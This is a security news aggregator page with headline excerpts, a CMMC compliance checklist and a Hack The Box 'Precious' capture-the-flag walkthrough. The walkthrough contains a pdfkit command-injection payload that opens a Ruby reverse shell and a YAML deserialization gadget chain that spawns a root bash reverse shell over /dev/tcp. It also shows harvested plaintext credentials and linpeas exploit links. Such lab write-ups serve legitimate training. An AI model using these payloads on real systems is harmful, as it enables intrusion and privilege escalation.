BackBox.org News – Page 88 – Latest news and insights on Security

BackBox News

Visio Trust Raises $7 Million for Third-Party Risk Management Platform

November 25, 2024/in General News

San Francisco-based third-party risk management provider Visio Trust has raised $7 million in venture funding.

The post Visio Trust Raises $7 Million for Third-Party Risk Management Platform appeared first on SecurityWeek.

SecurityWeek – Read More

Cybersecurity 101: Understanding MITRE ATT&CK Framework

November 25, 2024/in General News

Traditional security frameworks often fail to connect with the realities of development. Usually, we see the results of them in PDFs and compliance documents, making it hard for developers to see how they relate to the actual code. As someone who tinkered with both worlds, Mitre is more valuable from a developer’s perspective than OWASP Top 10. Insisting at the same time that OWASP has its clear…

Source

TechSplicer – Read More

North Korea Deploying Fake IT Workers in China, Russia, Other Countries

November 25, 2024/in General News

The North Korean fake IT workers have infiltrated businesses in China, Russia, and other countries aside from the US.

The post North Korea Deploying Fake IT Workers in China, Russia, Other Countries appeared first on SecurityWeek.

SecurityWeek – Read More

UK seeks collaboration for security research lab to counter Russia and ‘new AI arms race’

November 25, 2024/in General News

The U.K. is seeking collaboration for a new AI security research lab that’s designed to counter Russia and other hostile states in what it dubs the “new AI arms race.” While the U.K. government has launched numerous funding initiatives in the past to support cybersecurity projects, the rise of AI-fueled nation-state attacks, specifically, is the […]

Security News | TechCrunch – Read More

THN Recap: Top Cybersecurity Threats, Tools, and Practices (Nov 18 – Nov 24)

November 25, 2024/in General News

We hear terms like “state-sponsored attacks” and “critical vulnerabilities” all the time, but what’s really going on behind those words? This week’s cybersecurity news isn’t just about hackers and headlines—it’s about how digital risks shape our lives in ways we might not even realize.
For instance, telecom networks being breached isn’t just about stolen data—it’s about power. Hackers are

The Hacker News – Read More

Microlise Confirms Data Breach as Ransomware Group Steps Forward

November 25, 2024/in General News

The SafePay ransomware group claims to have stolen over 1 terabyte of data from vehicle tracking solutions provider Microlise.

The post Microlise Confirms Data Breach as Ransomware Group Steps Forward appeared first on SecurityWeek.

SecurityWeek – Read More

Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections

November 25, 2024/in General News

Cybersecurity researchers have uncovered a new malicious campaign that leverages a technique called Bring Your Own Vulnerable Driver (BYOVD) to disarm security protections and ultimately gain access to the infected system.
“This malware takes a more sinister route: it drops a legitimate Avast Anti-Rootkit driver (aswArPot.sys) and manipulates it to carry out its destructive agenda,” Trellix

The Hacker News – Read More

Russian Cyberspies Hacked Building Across Street From Target for Wi-Fi Attack

November 25, 2024/in General News

Russian cyberspy group APT28 conducted a Nearest Neighbor Attack, where it hacked into the building across the street from the victim for a Wi-Fi attack.

The post Russian Cyberspies Hacked Building Across Street From Target for Wi-Fi Attack appeared first on SecurityWeek.

SecurityWeek – Read More

The CMMC Countdown, Part 3

November 25, 2024/in General News

As stressed in the previous CMMC Countdown post, the five points are make or break to get a conditional CMMC certification. We will continue briefly reviewing how to address the remaining five pointers.

CMMC Action Plan, continued

AC.L2-3.1.18

Control connection of mobile devices.
Determine if:
[a] mobile devices that process, store, or transmit CUI are identified;
[b] mobile device connections are authorized; and
[c] mobile device connections are monitored and logged.

Consider showing that all mobile devices are managed using mobile device management (MDM) software the provides built-in authorization, monitoring and logging.

You could simplify your compliance posture by preventing mobile device access.

AT.L2-3.2.1

Ensure that managers, systems administrators, and users of organizational systems are made aware of the security risks associated with their activities and of the applicable policies, standards, and procedures related to the security of those systems.
Determine if:
[a] security risks associated with organizational activities involving CUI are identified;
[b] policies, standards, and procedures related to the security of the system are identified;
[c] managers, systems administrators, and users of the system are made aware of the security risks associated with their activities; and
[d] managers, systems administrators, and users of the system are made aware of the applicable policies, standards, and procedures related to the security of the system.

Consider showing a security awareness and training plan document that identifies your organization’s cybersecurity and CUI risks and the training courses that will educate employees on those risks. Consider using the SANS Security Awareness Planning Toolkit.

AT.L2-3.2.2

Ensure that personnel are trained to carry out their assigned information security-related duties and responsibilities.
Determine if:
[a] information security-related duties, roles, and responsibilities are defined;
[b] information security-related duties, roles, and responsibilities are assigned to designated personnel; and
[c] personnel are adequately trained to carry out their assigned information securityrelated duties, roles, and responsibilities.

Consider showing the training assigned to the information technology and cybersecurity team members. Also, the training should be focused on the specific IT and cybersecurity systems used at your organization. Consider identifying these training assignments in your security awareness and training plan.

AU.L2-3.3.1

Create and retain system audit logs and records to the extent needed to enable the monitoring, analysis, investigation, and reporting of unlawful or unauthorized system activity.
Determine if:
[a] audit logs needed (i.e., event types to be logged) to enable the monitoring, analysis, investigation, and reporting of unlawful or unauthorized system activity are specified;
[b] the content of audit records needed to support monitoring, analysis, investigation, and reporting of unlawful or unauthorized system activity is defined;
[c] audit records are created (generated);
[d] audit records, once created, contain the defined content;
[e] retention requirements for audit records are defined; and
[f] audit records are retained as defined.

Consider reviewing which logs your systems are already capturing and how long they are being retained. Document those existing logs and the retention period. Review them and see whether they can help identify unlawful or unauthorized activity. Your security information and event manager (SIEM) might be able to create reports that identify unauthorized logins and anomalous behavior. Document this internal review as additional evidence. Make adjustments to the logs and retention periods as needed.

CM.L2-3.4.1

Establish and maintain baseline configurations and inventories of organizational systems (including hardware, software, firmware, and documentation) throughout the respective system development life cycles.
Determine if:
[a] a baseline configuration is established;
[b] the baseline configuration includes hardware, software, firmware, and documentation;
[c] the baseline configuration is maintained (reviewed and updated) throughout the system development life cycle;
[d] a system inventory is established;
[e] the system inventory includes hardware, software, firmware, and documentation; and
[f] the inventory is maintained (reviewed and updated) throughout the system development life cycle.

Consider creating a document that captures the hardware, software, and firmware when setting up new workstations, laptops, and servers. Revise this document at least annually. Create a document or use an inventory tracking system that identifies all the devices and their hardware, software, and firmware. Review the document at least annually, but ideally, as changes occur if you track it manually.

CM.L2-3.4.2

Establish and enforce security configuration settings for information technology products employed in organizational systems.
Determine if:
[a] security configuration settings for information technology products employed in the system are established and included in the baseline configuration; and
[b] security configuration settings for information technology products employed in the system are enforced.

Consider showing how you harden each new machine and maintain its hardening. Show the scripts, Windows group policy objects, and security profiles (in MDM and security management tools). Collect any reports that show how these security configurations are applied and maintained.

IA.L2-3.5.1

Identify system users, processes acting on behalf of users, and devices.
Determine if:
[a] system users are identified;
[b] processes acting on behalf of users are identified; and
[c] devices accessing the system are identified.

Consider leveraging the implementation and evidence used for AC.L2-3.1.1. Furthermore, consider defining how each user’s unique identifier (e.g., username) and device’s unique identifiers (e.g., hostname) are assigned.

IA.L2-3.5.2

Authenticate (or verify) the identities of users, processes, or devices, as a prerequisite to allowing access to organizational systems.
Determine if:
[a] the identity of each user is authenticated or verified as a prerequisite to system access;
[b] the identity of each process acting on behalf of a user is authenticated or verified as a prerequisite to system access; and
[c] the identity of each device accessing or connecting to the system is authenticated or verified as a prerequisite to system access.

Consider showing that all systems require a unique username and password to authenticate. Remove default usernames if possible, or change their default passwords. Avoid shared usernames if possible,e or use a password manager that logs who is accessing the shared username. For service accounts, consider creating a naming convention that identifies its purpose.

IR.L2-3.6.1

Establish an operational incident-handling capability for organizational systems that includes preparation, detection, analysis, containment, recovery, and user response activities.
Determine if:
[a] an operational incident-handling capability is established;
[b] the operational incident-handling capability includes preparation;
[c] the operational incident-handling capability includes detection;
[d] the operational incident-handling capability includes analysis;
[e] the operational incident-handling capability includes containment;
[f] the operational incident-handling capability includes recovery; and
[g] the operational incident-handling capability includes user response activities.

Consider creating an incident response plan. The plan should show the process to addressing and resolving an incident. The plan steps should address each operational incident-handling capability defined in the CMMC control. You can use the Cybersecurity & Infrastructure Security Agency (CISA) Incident Response Plan (IRP) Basics to get started.

IR.L2-3.6.2

Track, document, and report incidents to designated officials and/or authorities both internal and external to the organization.
Determine if:
[a] incidents are tracked;
[b] incidents are documented;
[c] authorities to whom incidents are to be reported are identified;
[d] organizational officials to whom incidents are to be reported are identified;
[e] identified authorities are notified of incidents; and
[f] identified organizational officials are notified of incidents.

Create a form, set up an internal database, or use your security tools to document and track incidents. Update your IRP to include the contact information of internal (e.g., executives, directors) and external authorities (e.g., DIBNet, CISA, FBI) to contact during an incident and when to contact them. An incident affecting CUI must be reported using the DIBNet portal, which requires an ECA certificate.

MA.L2-3.7.2

Provide controls on the tools, techniques, mechanisms, and personnel used to conduct system maintenance.
Determine if:
[a] tools used to conduct system maintenance are controlled;
[b] techniques used to conduct system maintenance are controlled;
[c] mechanisms used to conduct system maintenance are controlled; and
[d] personnel used to conduct system maintenance are controlled.

Consider documenting:

The ticketing system that tracks maintenance activities.
The antivirus software keeps the system free of malware prior to, during, and after the maintenance activities.
The local and remote maintenance software used during activities.
The list of personnel authorized to perform maintenance activities.

MP.L2-3.8.3

Sanitize or destroy system media containing CUI before disposal or release for reuse.
Determine if:
[a] system media containing CUI is sanitized or destroyed before disposal; and
[b] system media containing CUI is sanitized before it is released for reuse.

Consider documenting a procedure on how CUI systems are sanitized (e.g., writing zeroes on the drive) and destroyed (e.g., degaussing and secure shredding). Consider reviewing and tailoring NIST Special Publication 800-88, Revision 1, Guidelines for Media Sanitization.

Before you go

We will review the more five-point controls in the next post.

Secjuice – Read More

HTB Precious Walkthrough

November 25, 2024/in General News

A really simple BOX to start gaining experience!

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-11 14:57 EST
Nmap scan report for 10.10.11.189
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.24 seconds

Of course, the only access point is the HTTP on port 80; insert the precious.htb domain in the /etc/hosts file and proceed.

The portal seems to be a straightforward converter of Web pages to PDF. In addition to having a single access point, the feature leaves no doubt about the attack to be carried out, you just need to identify the exact tool used for the conversion and understand what kind of vulnerability it suffers from. By being able to enter a URL in the only available text field, the vulnerability could be hidden in the URL itself or in the page to be converted (the payload). We, therefore, verify that the BOX reaches us and that we can pass a personal payload; we start a native php server and insert our address in the form field.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.189 - Precious (lin)/attack]
└─$ php -S 10.10.14.79:5000 
[Sun Dec 11 15:07:49 2022] PHP 8.1.12 Development Server (http://10.10.14.79:5000) started
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 Accepted
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 [404]: GET / - No such file or directory
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 Closing

The 404 error code, however, does not start the conversion, so I prepared an empty html page, downloaded the output of the operation, and looked inside, looking for information concerning the tool used for the conversion.

%PDF-1.4
%âã
1 0 obj
<<
/Title ()
/Creator (��wkhtmltopdf 0.12.6)
/Producer (��Qt 5.15.2)
/CreationDate (D:20221211153322-05'00')
[...]
1037 
%%EOF
%BeginExifToolUpdate
1 0 obj
<<
/Creator (Generated by pdfkit v0.8.6)
>>
endobj
11 0 obj
[...]

I was a bit confused. Inside the file there seem to be indications about two different conversion tools: wkhtmltopdf and pdfkit. They’re both conversion tools, but I didn’t understand why they’re both being repurposed. However, the exiftool seems to identify the pdfkit in the metadata.

┌──(in7rud3r㉿kali-muletto)-[~/Downloads]
└─$ exiftool 9y7vtnuzxwr6isk3hdttvuy8fng2kxrx.pdf 
ExifTool Version Number         : 12.51
File Name                       : 9y7vtnuzxwr6isk3hdttvuy8fng2kxrx.pdf
Directory                       : .
File Size                       : 4.6 kB
File Modification Date/Time     : 2022:12:11 15:37:29-05:00
File Access Date/Time           : 2022:12:11 15:38:06-05:00
File Inode Change Date/Time     : 2022:12:11 15:37:29-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

In order not to leave anything to chance, however, let’s also take a look at the first one. Looking for exploits for the first tool, something comes up, but it doesn’t seem to work despite multiple attempts.

Convinced that it is still the second tool that is really the object of the challenge, I want to look for exploits for this second one.

A nice list.

Snyk Vulnerability Database | Snyk

High severity (7.3) Command Injection in pdfkit | CVE-2022-25765

Learn more about RubyGems with Snyk Open Source Vulnerability Database

And that looked really interesting. I immediately tried with the verification payload shown in the example, which gave me good results. Sleep seems to have been performed before the conversion process and the pdf is returned to me after the 15 seconds indicated, increasing the time of the command also increases the interval before the download starts.

http://10.10.14.14:5000/file.html?name=#{'%20`sleep 15`'}

We should have identified the vulnerability. Now, let’s see how to use it. The second example payload also provides useful information, and the commands interpreted by the converter are reported as processed data in the URL addressed to my php server.

[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 Accepted
[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 [200]: GET /file.html?pwd=/var/www/pdfapp&user=ruby
[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 Closing

All we have to do is insist on this path, and try to recover as much information as possible and perhaps take advantage of the execution of commands via injection of the payload into the URLs. Despite my attempts, I still couldn’t recover the data in the most common files, so I decided to look for a more specific payload for this attack that allowed me to exploit an RCE, and I found it easily.

Of course, I refined the attack and identified the payload that fits my scenario.

http://10.10.14.14:5000/file.html?name={%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.14",4444))')`}

Perfect, despite having obtained a reverse shell on the machine, it seems that my user does not own the user flag, let alone have permission to read it.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.189] 46478
whoami
ruby
pwd
/var/www/pdfapp
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 08:28 .
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 08:28 app
drwxr-xr-x 2 root ruby 4096 Oct 26 08:28 config
-rw-r--r-- 1 root ruby   59 Sep 10 09:46 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17 14:17 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26 05:04 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 12 16:34 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 08:28 public
ls -la /home/
total 16
drwxr-xr-x  4 root  root  4096 Oct 26 08:28 .
drwxr-xr-x 18 root  root  4096 Nov 21 15:11 ..
drwxr-xr-x  3 henry henry 4096 Dec 12 13:29 henry
drwxr-xr-x  4 ruby  ruby  4096 Dec 12 13:15 ruby
ls -la /home/ruby/
total 28
drwxr-xr-x 4 ruby ruby 4096 Dec 12 13:15 .
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root root    9 Oct 26 07:53 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26 08:28 .bundle
drwxr-xr-x 4 ruby ruby 4096 Dec 12 15:33 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile
ls -la /home/henry/
total 32
drwxr-xr-x 3 henry henry 4096 Dec 12 13:29 .
drwxr-xr-x 4 root  root  4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root  root     9 Sep 26 05:04 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry  220 Sep 26 04:40 .bash_logout
-rw-r--r-- 1 henry henry 3526 Sep 26 04:40 .bashrc
-rw-r--r-- 1 henry henry  617 Dec 12 13:29 dependencies.yml
drwxr-xr-x 3 henry henry 4096 Dec 12 13:21 .local
-rw-r--r-- 1 henry henry  807 Sep 26 04:40 .profile
-rw-r----- 1 root  henry   33 Dec 12 13:14 user.txt
cat /home/henry/user.txt
cat: /home/henry/user.txt: Permission denied

I’m not there to rehash it. I tried to start a session of linpeas.

[...]
╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-0847                                                                                                                                                                  

Potentially Vulnerable to CVE-2022-2588
[...]
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                                       
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops                                                                                                                                           

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
[...]
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                            
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                                                                                                                        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:45983         0.0.0.0:*               LISTEN      798/Passenger RubyA 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
[...]
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 20086720 Dec 12 16:45 /var/log/nginx/access.log                                                                                                                                   

-rw-r----- 1 www-data adm 0 Dec 12 13:14 /var/log/nginx/error.log
[...]
                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                                                      
                               ╚═══════════════════╝                                                                                                                                                     
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
strace Not Found                                                                                                                                                                                         
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20                                                                                                                               
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 179K Feb 27  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 1.2M Mar 27  2022 /usr/bin/bash
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-- 1 root messagebus 51K Oct  5 07:04 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul  1 18:37 /usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
-rwxr-sr-x 1 root ssh 347K Jul  1 18:37 /usr/bin/ssh-agent                                                                                                                                               
-rwxr-sr-x 1 root crontab 43K Feb 22  2021 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Feb  7  2020 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K Jan 20  2022 /usr/bin/wall
-rwxr-sr-x 1 root shadow 79K Feb  7  2020 /usr/bin/chage
-rwxr-sr-x 1 root shadow 38K Aug 26  2021 /usr/sbin/unix_chkpwd
[...]
/home/ruby/.bundle
/home/ruby/.bundle/config
[...]

Apparently, there’s a lot of stuff to check, but once you start getting familiar with HTB machines, you also start to understand that, in most cases, the CVEs suggested by the tool aren’t the solution. Leaving those aside and taking a quick look at the other clues, I’m immediately attracted to the .bundle folder (and the configuration file it contains), which is located in the home of the user I’m connected to.

cat .bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

I told you it would be a simple BOX. Inside the file, I found credentials that seem to belong to the user who owns the flag. Fooled by the fact that the BOX is starting to look a little too simple, I try to identify the password encryption algorithm with the hashcat… but that doesn’t bring up anything. Almost disappointed and incredulous of what is going through my head, I tried to connect in ssh using the password as if it were unencrypted.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.189 - Precious (lin)/attack/hc]
└─$ ssh henry@10.10.11.189
The authenticity of host '10.10.11.189 (10.10.11.189)' can't be established.
ED25519 key fingerprint is SHA256:1WpIxI8qwKmYSRdGtCjweUByFzcn0MSpKgv+AwWRLkU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.189' (ED25519) to the list of known hosts.
henry@10.10.11.189's password: 
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 12 13:42:09 2022 from 10.10.14.53
-bash-5.1$ cat user.txt 
c******************************a

I admit I don’t know what that .bundle folder is, but after what I’ve seen, I don’t even want to investigate that much.

Ready to proceed in the most difficult roads towards the root flag. I checked what I can launch as root without password. I’m sure I won’t be able to execute…

-bash-5.1$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

…OK, forget it.

-bash-5.1$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

It appears to be a Ruby script that verifies the versions of the packages listed in a yaml file against the versions available from the official repositories. The yaml file is really very simple.

henry@precious:~$ find / -name "dependencies.yml" 2>/dev/null
/opt/sample/dependencies.yml
henry@precious:~$ cat /opt/sample/dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

The first approach, looking for file replacements and user path overrides to trick the script, leads me to no particular idea. However, the yaml is a structure that can also contain information related to the execution of code or command, references to files, and so on. I tried to take advantage of the Load command of the YAML package used in the script. Searching on the Internet, I found something interesting.

Perfect, I prepare my payload…

henry@precious:/tmp/rbe$ cat dependencies.yml 
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.106/4444 0>&1'"
         method_id: :resolve

I ran the script as administrator…

henry@precious:/tmp/rbe$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found

…and here is my root shell, which allows me to retrieve the root flag.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.106] from (UNKNOWN) [10.10.11.189] 54934
root@precious:/tmp/rbe# whoami
whoami
root
root@precious:/tmp/rbe# cat /root/root.txt
cat /root/root.txt
5******************************2
root@precious:/tmp/rbe# ^C

This is a nice BOX to start with. That’s all, folks. Have fun hacking activities (legally, as always), and see you in the next BOX.

Secjuice – Read More

Company Blogs

January 10, 2025

BadRAM: attack using malicious RAM module | Kaspersky official blog

January 10, 2025

U.S. Telecom, Zero-Day Attacks Show Need for Cybersecurity Hygiene

January 10, 2025

Critical ICS Vulnerabilities Uncovered in Weekly Vulnerability Report

January 9, 2025

Do we still have to keep doing it like this?

January 9, 2025

HexaLocker V2: Skuld Stealer Paving the Way prior to Encryption

January 9, 2025

How vulnerable Ecovacs robot vacuums are being hacked | Kaspersky official blog

January 9, 2025

Lithuania’s New Cyber Command is a Strategic Step Towards National and NATO Cybersecurity Resilience

January 8, 2025

CISA Releases Two New Industrial Control Systems Advisories for 2025

January 8, 2025

The Commonwealth Cyber Security Posture 2024: A Deep Dive into Australia’s Cyber Defense Measures

January 7, 2025

MyCERT Advisory Recommends Cybersecurity Practices for Water Systems

Hacking Tools

No feed items found.

Exploit DB

[webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
Source: Exploit DB Published on 2024-11-15

BackBox.org offers a range of Penetration Testing services to simulate an attack on your network or application. If you are interested in our services, please contact us and we will provide you with further information as well as an initial consultation.

Click me

Make a Donation